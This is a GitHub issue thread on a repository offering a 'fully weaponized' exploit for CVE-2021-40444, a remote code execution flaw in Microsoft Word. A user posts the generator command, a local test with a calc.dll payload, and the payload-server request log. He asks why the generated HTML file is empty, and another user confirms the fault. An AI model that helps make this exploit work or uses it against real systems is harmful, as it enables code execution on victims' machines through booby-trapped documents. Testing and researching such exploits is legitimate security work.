klezVirus / CVE-2021-40444

CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit

The cab with dll doesn't work #15

Open RCECoder opened 2 years ago

RCECoder commented 2 years ago

Hi,

I used

python generator.py -u http://127.0.0.1 -P test\calc.dll --host

to generate the exploit. When opening the docx to test locally, here is what shows up on the payload server:

127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:21] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -

What could be wrong? Or am I missing something?

RCECoder commented 2 years ago

Updated to add more info. Why is the generated HTML file (the one with the random name in \srv) 0 bytes in size? Is this normal?

alien2003 commented 2 years ago

I confirm this issue; the resulting HTML file is null.